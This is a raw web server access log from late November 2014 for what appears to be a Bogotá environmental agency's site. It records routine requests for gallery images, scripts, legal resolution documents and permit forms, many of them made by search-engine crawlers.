186.147.81.63 - - [30/Nov/2014:10:48:36 -0500] "GET /galeria/nivo-slider/demo/images/porloshumedales.jpg HTTP/1.1" 200 351238
186.147.81.63 - - [30/Nov/2014:10:48:37 -0500] "GET /galeria/nivo-slider/demo/images/Tingua-azul.jpg HTTP/1.1" 200 307638
186.147.81.63 - - [30/Nov/2014:10:48:37 -0500] "GET /galeria/nivo-slider/demo/images/Banner-Caracol-Africano.jpg HTTP/1.1" 200 331986
186.147.81.63 - - [30/Nov/2014:10:48:37 -0500] "GET /galeria/nivo-slider/demo/images/banner-redes.jpg HTTP/1.1" 200 62209
186.147.81.63 - - [30/Nov/2014:10:48:38 -0500] "GET /galeria/nivo-slider/demo/images/9Signos.jpg HTTP/1.1" 200 93040
186.147.81.63 - - [30/Nov/2014:10:48:38 -0500] "GET /galeria/nivo-slider/demo/images/banner-caballos.png HTTP/1.1" 200 389106
186.147.81.63 - - [30/Nov/2014:10:48:39 -0500] "GET /galeria/nivo-slider/demo/images/Hacienda_Molinos.jpg HTTP/1.1" 200 319171
186.147.81.63 - - [30/Nov/2014:10:48:40 -0500] "GET /galeria/nivo-slider/demo/images/bannerEcolecta3.jpg HTTP/1.1" 200 280034
186.147.81.63 - - [30/Nov/2014:10:48:40 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
186.147.81.63 - - [30/Nov/2014:10:48:40 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
186.147.81.63 - - [30/Nov/2014:10:48:42 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
186.147.81.63 - - [30/Nov/2014:10:48:42 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
186.147.81.63 - - [30/Nov/2014:10:48:43 -0500] "GET /videos/Spot_CambioClimatico.flv HTTP/1.1" 200 4371917
66.249.65.115 - - [30/Nov/2014:10:48:57 -0500] "GET /BLA/resoluciones/AUTOS%202007/3104.pdf HTTP/1.1" 304 -
186.154.84.82 - - [30/Nov/2014:10:43:07 -0500] "GET /ForestMSG_SDA/channelAsync/template_word_16980384?X-Atmosphere-tracking-id=09cc4d21-633c-533d-90c8-6afddd3b4e2f&X-Atmosphere-Framework=1.0.5&X-Atmosphere-Transport=long-polling&tabid=0.03968597715720534&X-Cache-Date=0&Content-Type=application/xml&_=1417362365283 HTTP/1.1" 200 8193
66.249.65.115 - - [30/Nov/2014:10:49:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204101%20AL%204200/RESOLUCION%204191%20DE%202007.pdf HTTP/1.1" 200 229426
186.145.58.53 - - [30/Nov/2014:10:49:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d59f3302a812bb4270ac9bcb1e642f75c7.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
181.60.65.187 - - [30/Nov/2014:10:49:33 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
181.60.65.187 - - [30/Nov/2014:10:49:33 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
181.60.65.187 - - [30/Nov/2014:10:49:33 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
188.165.15.152 - - [30/Nov/2014:10:49:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201051-1100/00001069.tif HTTP/1.1" 200 105106
66.249.65.123 - - [30/Nov/2014:10:49:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/1570.pdf HTTP/1.1" 304 -
188.165.15.181 - - [30/Nov/2014:10:49:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%20%201601-1650/00001649.tif HTTP/1.1" 200 104374
66.249.65.119 - - [30/Nov/2014:10:50:21 -0500] "GET /BLA/resoluciones/AUTOS%202010/3474.pdf HTTP/1.1" 304 -
190.29.72.192 - - [30/Nov/2014:10:50:21 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
190.29.72.192 - - [30/Nov/2014:10:50:21 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
190.29.72.192 - - [30/Nov/2014:10:50:21 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.29.72.192 - - [30/Nov/2014:10:50:21 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
190.29.72.192 - - [30/Nov/2014:10:50:21 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
190.29.72.192 - - [30/Nov/2014:10:50:22 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
190.29.72.192 - - [30/Nov/2014:10:50:25 -0500] "GET /galeria/nivo-slider/demo/demo.html HTTP/1.1" 200 3458
190.29.72.192 - - [30/Nov/2014:10:50:25 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
190.29.72.192 - - [30/Nov/2014:10:50:25 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
190.29.72.192 - - [30/Nov/2014:10:50:25 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
190.29.72.192 - - [30/Nov/2014:10:50:25 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
190.29.72.192 - - [30/Nov/2014:10:50:25 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
190.29.72.192 - - [30/Nov/2014:10:50:25 -0500] "GET /galeria/nivo-slider/demo/images/Banner-GAE3.jpg HTTP/1.1" 200 146354
190.29.72.192 - - [30/Nov/2014:10:50:25 -0500] "GET /galeria/nivo-slider/demo/images/festivalBasura0.jpg HTTP/1.1" 200 96780
190.29.72.192 - - [30/Nov/2014:10:50:25 -0500] "GET /galeria/nivo-slider/demo/images/Banner-comparendo.jpg HTTP/1.1" 200 388762
190.29.72.192 - - [30/Nov/2014:10:50:26 -0500] "GET /galeria/nivo-slider/demo/images/banner-pygaai.jpg HTTP/1.1" 200 82693
190.29.72.192 - - [30/Nov/2014:10:50:26 -0500] "GET /galeria/nivo-slider/demo/images/Biotaxis-Man.jpg HTTP/1.1" 200 99362
190.29.72.192 - - [30/Nov/2014:10:50:26 -0500] "GET /galeria/nivo-slider/demo/images/porloshumedales.jpg HTTP/1.1" 200 351238
190.29.72.192 - - [30/Nov/2014:10:50:26 -0500] "GET /galeria/nivo-slider/demo/images/Tingua-azul.jpg HTTP/1.1" 200 307638
190.29.72.192 - - [30/Nov/2014:10:50:26 -0500] "GET /galeria/nivo-slider/demo/images/Banner-Caracol-Africano.jpg HTTP/1.1" 200 331986
190.29.72.192 - - [30/Nov/2014:10:50:26 -0500] "GET /galeria/nivo-slider/demo/images/banner-redes.jpg HTTP/1.1" 200 62209
190.29.72.192 - - [30/Nov/2014:10:50:27 -0500] "GET /galeria/nivo-slider/demo/images/9Signos.jpg HTTP/1.1" 200 93040
190.29.72.192 - - [30/Nov/2014:10:50:28 -0500] "GET /galeria/nivo-slider/demo/images/banner-caballos.png HTTP/1.1" 200 389106
190.29.72.192 - - [30/Nov/2014:10:50:28 -0500] "GET /galeria/nivo-slider/demo/images/Hacienda_Molinos.jpg HTTP/1.1" 200 319171
190.29.72.192 - - [30/Nov/2014:10:50:28 -0500] "GET /galeria/nivo-slider/demo/images/bannerEcolecta3.jpg HTTP/1.1" 200 280034
181.50.241.109 - - [30/Nov/2014:10:50:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d5f682009d5f7842a48dd7955190f32559.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.29.72.192 - - [30/Nov/2014:10:50:30 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
190.29.72.192 - - [30/Nov/2014:10:50:30 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
190.29.72.192 - - [30/Nov/2014:10:50:31 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
190.29.72.192 - - [30/Nov/2014:10:50:31 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
190.29.72.192 - - [30/Nov/2014:10:50:31 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
190.29.72.192 - - [30/Nov/2014:10:50:31 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
66.249.65.123 - - [30/Nov/2014:10:50:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0335.pdf HTTP/1.1" 304 -
186.84.11.121 - - [30/Nov/2014:10:51:09 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
186.84.11.121 - - [30/Nov/2014:10:51:09 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
186.84.11.121 - - [30/Nov/2014:10:51:09 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
188.165.15.235 - - [30/Nov/2014:10:51:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20401-450/00000436.tif HTTP/1.1" 200 59396
66.249.65.115 - - [30/Nov/2014:10:51:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201701-1750/20021721.tif HTTP/1.1" 200 72068
66.249.65.115 - - [30/Nov/2014:10:51:17 -0500] "GET /BLA/resoluciones/AUTOS%202007/2052.pdf HTTP/1.1" 304 -
190.239.70.122 - - [30/Nov/2014:10:51:25 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
190.239.70.122 - - [30/Nov/2014:10:51:25 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
190.239.70.122 - - [30/Nov/2014:10:51:25 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.145.58.53 - - [30/Nov/2014:10:51:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d59f3302a812bb4270ac9bcb1e642f75c7.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
180.76.5.176 - - [30/Nov/2014:10:51:32 -0500] "GET /BLA/resoluciones/AUTOS%202009/1883.pdf HTTP/1.1" 200 130385
66.249.65.115 - - [30/Nov/2014:10:51:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20401%20AL%20500/RESOLUCION%200427%20DE%202007.pdf HTTP/1.1" 200 262626
74.86.158.107 - - [30/Nov/2014:10:51:50 -0500] "HEAD / HTTP/1.1" 302 -
66.249.65.123 - - [30/Nov/2014:10:52:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/1147.pdf HTTP/1.1" 200 697072
181.50.241.109 - - [30/Nov/2014:10:52:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d5f682009d5f7842a48dd7955190f32559.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.65.119 - - [30/Nov/2014:10:52:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7312.pdf HTTP/1.1" 200 516853
66.249.65.119 - - [30/Nov/2014:10:53:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1743.pdf HTTP/1.1" 200 513669
186.145.58.53 - - [30/Nov/2014:10:53:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d59f3302a812bb4270ac9bcb1e642f75c7.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.65.119 - - [30/Nov/2014:10:53:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20901%20AL%201000/RESOLUCION%200905%20DE%202007.pdf HTTP/1.1" 304 -
201.245.192.253 - - [30/Nov/2014:10:53:48 -0500] "GET /plugins/like.php?app_id=&channel=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter%2F7r8gQb8MIqE.js%3Fversion%3D41%23cb%3Df380b000d8%26domain%3Dwww.radios.com.co%26origin%3Dhttp%253A%252F%252Fwww.radios.com.co%252Ff3b5c48078%26relation%3Dparent.parent&font=arial&height=23&href=http%3A%2F%2Fwww.radios.com.co%2F&layout=button_count&locale=es_LA&sdk=joey&send=false&show_faces=false&width=150 HTTP/1.1" 404 1254
201.245.192.253 - - [30/Nov/2014:10:53:49 -0500] "GET /v/ZuASj_t0kH0?adformat=2_9&version=3&showinfo=0&rel=0&controls=1&iv_load_policy=1 HTTP/1.1" 404 2883
66.249.65.123 - - [30/Nov/2014:10:54:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20601%20AL%20700/RESOLUCION%200669%20DE%202007.pdf HTTP/1.1" 200 943807
66.249.88.213 - - [30/Nov/2014:10:54:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/1898.pdf HTTP/1.1" 200 2832821
180.76.5.60 - - [30/Nov/2014:10:54:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1695.pdf HTTP/1.1" 200 220780
201.245.192.253 - - [30/Nov/2014:10:54:15 -0500] "GET /plugins/like.php?app_id=&channel=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter%2F7r8gQb8MIqE.js%3Fversion%3D41%23cb%3Df15897545%26domain%3Dwww.radios.com.co%26origin%3Dhttp%253A%252F%252Fwww.radios.com.co%252Ff387f3ea9%26relation%3Dparent.parent&font=arial&height=23&href=http%3A%2F%2Fwww.radios.com.co%2F&layout=button_count&locale=es_LA&sdk=joey&send=false&show_faces=false&width=150 HTTP/1.1" 404 1254
201.245.192.253 - - [30/Nov/2014:10:54:16 -0500] "GET /v/ZuASj_t0kH0?adformat=2_9&version=3&showinfo=0&rel=0&controls=1&iv_load_policy=1 HTTP/1.1" 404 2903
181.50.241.109 - - [30/Nov/2014:10:54:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d5f682009d5f7842a48dd7955190f32559.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.65.123 - - [30/Nov/2014:10:54:34 -0500] "GET /Autoliquidacion/Grupo%20Forestal%20-%20Silvicultura/ HTTP/1.1" 200 4148
180.76.5.94 - - [30/Nov/2014:10:54:59 -0500] "GET /BLA/resoluciones/AUTOS%202009/0053.pdf HTTP/1.1" 200 82233
123.125.71.36 - - [30/Nov/2014:10:55:02 -0500] "GET / HTTP/1.1" 302 -
66.249.65.123 - - [30/Nov/2014:10:55:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9292.pdf HTTP/1.1" 200 235791
186.154.84.82 - - [30/Nov/2014:10:49:08 -0500] "GET /ForestMSG_SDA/channelAsync/template_word_16980384?X-Atmosphere-tracking-id=09cc4d21-633c-533d-90c8-6afddd3b4e2f&X-Atmosphere-Framework=1.0.5&X-Atmosphere-Transport=long-polling&tabid=0.03968597715720534&X-Cache-Date=0&Content-Type=application/xml&_=1417362726283 HTTP/1.1" 200 8193
186.145.58.53 - - [30/Nov/2014:10:55:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d59f3302a812bb4270ac9bcb1e642f75c7.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.159.25.81 - - [30/Nov/2014:10:55:29 -0500] "GET /isolucionsda/FrameSetGeneral.asp?Pagina=ListadoMaestroDocumentos3.asp HTTP/1.1" 200 146
201.245.192.253 - - [30/Nov/2014:10:49:30 -0500] "GET /ForestMSG_SDA/channelAsync/template_word_16520616?X-Atmosphere-tracking-id=47281ddc-6833-a8a6-0df3-dd19b95cfd81&X-Atmosphere-Framework=1.0.5&X-Atmosphere-Transport=long-polling&tabid=0.6438876590691507&X-Cache-Date=0&Content-Type=application/xml&_=1417362784128 HTTP/1.1" 200 8193
66.249.65.123 - - [30/Nov/2014:10:55:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5591.pdf HTTP/1.1" 304 -
186.42.231.86 - - [30/Nov/2014:10:55:33 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
186.42.231.86 - - [30/Nov/2014:10:55:33 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
186.42.231.86 - - [30/Nov/2014:10:55:33 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.249.65.123 - - [30/Nov/2014:10:55:59 -0500] "GET /BLA/resoluciones/AUTOS%202013/1048.pdf HTTP/1.1" 304 -
220.181.108.101 - - [30/Nov/2014:10:56:10 -0500] "GET / HTTP/1.1" 302 -
186.82.199.90 - - [30/Nov/2014:10:56:14 -0500] "GET /galeria/nivo-slider/demo/demo.html HTTP/1.1" 200 3458
186.82.199.90 - - [30/Nov/2014:10:56:16 -0500] "GET /galeria/nivo-slider/demo/images/Banner-GAE3.jpg HTTP/1.1" 200 146354
186.82.199.90 - - [30/Nov/2014:10:56:16 -0500] "GET /galeria/nivo-slider/demo/images/Banner-comparendo.jpg HTTP/1.1" 304 -
186.82.199.90 - - [30/Nov/2014:10:56:16 -0500] "GET /galeria/nivo-slider/demo/images/festivalBasura0.jpg HTTP/1.1" 200 96780
186.82.199.90 - - [30/Nov/2014:10:56:16 -0500] "GET /galeria/nivo-slider/demo/images/banner-pygaai.jpg HTTP/1.1" 200 82693
186.82.199.90 - - [30/Nov/2014:10:56:16 -0500] "GET /galeria/nivo-slider/demo/images/Biotaxis-Man.jpg HTTP/1.1" 304 -
186.82.199.90 - - [30/Nov/2014:10:56:16 -0500] "GET /galeria/nivo-slider/demo/images/porloshumedales.jpg HTTP/1.1" 304 -
186.82.199.90 - - [30/Nov/2014:10:56:17 -0500] "GET /galeria/nivo-slider/demo/images/Tingua-azul.jpg HTTP/1.1" 304 -
186.82.199.90 - - [30/Nov/2014:10:56:17 -0500] "GET /galeria/nivo-slider/demo/images/banner-redes.jpg HTTP/1.1" 304 -
186.82.199.90 - - [30/Nov/2014:10:56:17 -0500] "GET /galeria/nivo-slider/demo/images/Banner-Caracol-Africano.jpg HTTP/1.1" 304 -
186.82.199.90 - - [30/Nov/2014:10:56:17 -0500] "GET /galeria/nivo-slider/demo/images/9Signos.jpg HTTP/1.1" 304 -
186.82.199.90 - - [30/Nov/2014:10:56:17 -0500] "GET /galeria/nivo-slider/demo/images/bannerEcolecta3.jpg HTTP/1.1" 304 -
188.165.15.152 - - [30/Nov/2014:10:56:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%2051-100/00000096.tif HTTP/1.1" 200 103916
66.249.65.115 - - [30/Nov/2014:10:56:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5122.pdf HTTP/1.1" 304 -
201.245.192.253 - - [30/Nov/2014:10:56:27 -0500] "GET /plugins/like.php?app_id=147942975298175&channel=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter%2F7r8gQb8MIqE.js%3Fversion%3D41%23cb%3Dfb98f7c5%26domain%3Dwww.golcaracol.com%26origin%3Dhttp%253A%252F%252Fwww.golcaracol.com%252Ff25abca508%26relation%3Dparent.parent&href=http%3A%2F%2Fwww.golcaracol.com%2Ffutbol-internacional%2Finformaciongeneralfutbol%2Fla-historia-secreta&layout=button_count&locale=es_LA&sdk=joey&send=false&show_faces=true&width=450 HTTP/1.1" 404 1588
201.245.192.253 - - [30/Nov/2014:10:56:27 -0500] "GET /plugins/share_button.php?app_id=147942975298175&channel=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter%2F7r8gQb8MIqE.js%3Fversion%3D41%23cb%3Df152bf68ec%26domain%3Dwww.golcaracol.com%26origin%3Dhttp%253A%252F%252Fwww.golcaracol.com%252Ff25abca508%26relation%3Dparent.parent&href=http%3A%2F%2Fwww.golcaracol.com%2Fcolombianos-mundo&locale=es_LA&sdk=joey HTTP/1.1" 404 1588
181.50.241.109 - - [30/Nov/2014:10:56:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d5f682009d5f7842a48dd7955190f32559.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
74.86.158.107 - - [30/Nov/2014:10:56:50 -0500] "HEAD / HTTP/1.1" 302 -
66.249.65.115 - - [30/Nov/2014:10:56:55 -0500] "GET /BLA/resoluciones/AUTOS%202013/2798.pdf HTTP/1.1" 304 -
201.245.192.253 - - [30/Nov/2014:10:56:57 -0500] "GET /plugins/like.php?app_id=147942975298175&channel=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter%2F7r8gQb8MIqE.js%3Fversion%3D41%23cb%3Df3b255ef68%26domain%3Dwww.golcaracol.com%26origin%3Dhttp%253A%252F%252Fwww.golcaracol.com%252Ff37a5ddfa8%26relation%3Dparent.parent&href=http%3A%2F%2Fwww.golcaracol.com%2Ffutbol-internacional%2Finformaciongeneralfutbol%2Fla-tribuna&layout=button_count&locale=es_LA&sdk=joey&send=false&show_faces=true&width=450 HTTP/1.1" 404 1368
66.249.65.115 - - [30/Nov/2014:10:57:23 -0500] "GET /BLA/resoluciones/AUTOS%202013/0960.pdf HTTP/1.1" 304 -
186.145.58.53 - - [30/Nov/2014:10:57:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d59f3302a812bb4270ac9bcb1e642f75c7.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
188.165.15.235 - - [30/Nov/2014:10:57:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%202301-2350/00002337.tif HTTP/1.1" 200 284072
188.165.15.23 - - [30/Nov/2014:10:57:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201851-1900/20021855.tif HTTP/1.1" 200 303694
66.249.65.119 - - [30/Nov/2014:10:57:51 -0500] "GET /BLA/resoluciones/AUTOS%202011/5307.pdf HTTP/1.1" 200 228651
66.249.65.119 - - [30/Nov/2014:10:58:19 -0500] "GET /BLA/resoluciones/AUTOS%202007/3060.pdf HTTP/1.1" 304 -
190.26.56.47 - - [30/Nov/2014:10:58:20 -0500] "GET /autoliquidacion/TR%C3%81MITES%20VERTIMIENTOS/PERMISOS%20DE%20VERTIMIENTOS/ANEXO3.%20LISTA%20DE%20CHEQUEO%20PERMISO%20VERT.%20ALCANTARILLADO%20-%20F.xls HTTP/1.1" 206 1
190.26.56.47 - - [30/Nov/2014:10:58:20 -0500] "GET /autoliquidacion/TR%C3%81MITES%20VERTIMIENTOS/PERMISOS%20DE%20VERTIMIENTOS/ANEXO3.%20LISTA%20DE%20CHEQUEO%20PERMISO%20VERT.%20ALCANTARILLADO%20-%20F.xls HTTP/1.1" 206 223281
181.50.241.109 - - [30/Nov/2014:10:58:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d5f682009d5f7842a48dd7955190f32559.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.121.191.44 - - [30/Nov/2014:10:58:38 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
200.121.191.44 - - [30/Nov/2014:10:58:38 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
200.121.191.44 - - [30/Nov/2014:10:58:38 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.26.56.47 - - [30/Nov/2014:10:58:40 -0500] "GET /autoliquidacion/TR%C3%81MITES%20VERTIMIENTOS/REGISTRO%20DE%20VERTIMIENTOS/formulario%20reg%20de%20vertimientos%20no%20domesticos.doc HTTP/1.1" 200 408064
66.249.65.115 - - [30/Nov/2014:10:58:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1940.pdf HTTP/1.1" 200 317422
190.254.35.152 - - [30/Nov/2014:10:58:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6330.pdf HTTP/1.1" 200 531856
190.254.35.152 - - [30/Nov/2014:10:58:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6330.pdf HTTP/1.1" 200 531856
186.154.7.133 - - [30/Nov/2014:10:59:11 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.154.7.133 - - [30/Nov/2014:10:59:11 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
186.154.7.133 - - [30/Nov/2014:10:59:11 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
66.249.65.115 - - [30/Nov/2014:10:59:16 -0500] "GET /BLA/resoluciones/AUTOS%202014/1343.pdf HTTP/1.1" 304 -
188.165.15.23 - - [30/Nov/2014:10:59:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%20201-250/00000231.tif HTTP/1.1" 200 183546
186.145.58.53 - - [30/Nov/2014:10:59:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d59f3302a812bb4270ac9bcb1e642f75c7.e3iSbxaKaheRe34Sa3yKbhiTahb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.65.119 - - [30/Nov/2014:10:59:27 -0500] "GET /Autoliquidacion/Grupo%20Forestal%20-%20Silvicultura/Solicitud%20y%20lista%20de%20chequeo%20Evaluaci%C3%B3n%20Silvicultural.xlsx HTTP/1.1" 200 100649
66.249.65.115 - - [30/Nov/2014:10:59:28 -0500] "GET /BLA/resoluciones/AUTOS%202008/0487.pdf HTTP/1.1" 200 229572
190.158.15.227 - - [30/Nov/2014:10:59:39 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
190.158.15.227 - - [30/Nov/2014:10:59:40 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
190.158.15.227 - - [30/Nov/2014:10:59:40 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.158.15.227 - - [30/Nov/2014:10:59:40 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
190.158.15.227 - - [30/Nov/2014:10:59:40 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
190.158.15.227 - - [30/Nov/2014:10:59:40 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
66.249.65.119 - - [30/Nov/2014:10:59:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%203701%20AL%203800/RESOLUCION%203765%20DE%202007.pdf HTTP/1.1" 304 -
186.81.153.89 - - [30/Nov/2014:10:59:44 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
186.81.153.89 - - [30/Nov/2014:10:59:44 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
186.81.153.89 - - [30/Nov/2014:10:59:44 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.81.153.89 - - [30/Nov/2014:10:59:44 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
186.81.153.89 - - [30/Nov/2014:10:59:44 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
186.81.153.89 - - [30/Nov/2014:10:59:44 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
186.81.153.89 - - [30/Nov/2014:10:59:48 -0500] "GET /galeria/nivo-slider/demo/demo.html HTTP/1.1" 200 3458
186.81.153.89 - - [30/Nov/2014:10:59:48 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
186.81.153.89 - - [30/Nov/2014:10:59:48 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
186.81.153.89 - - [30/Nov/2014:10:59:48 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
186.81.153.89 - - [30/Nov/2014:10:59:48 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
186.81.153.89 - - [30/Nov/2014:10:59:48 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
186.81.153.89 - - [30/Nov/2014:10:59:48 -0500] "GET /galeria/nivo-slider/demo/images/Banner-GAE3.jpg HTTP/1.1" 200 146354
186.81.153.89 - - [30/Nov/2014:10:59:48 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
186.81.153.89 - - [30/Nov/2014:10:59:48 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
186.81.153.89 - - [30/Nov/2014:10:59:48 -0500] "GET /galeria/nivo-slider/demo/images/festivalBasura0.jpg HTTP/1.1" 200 96780
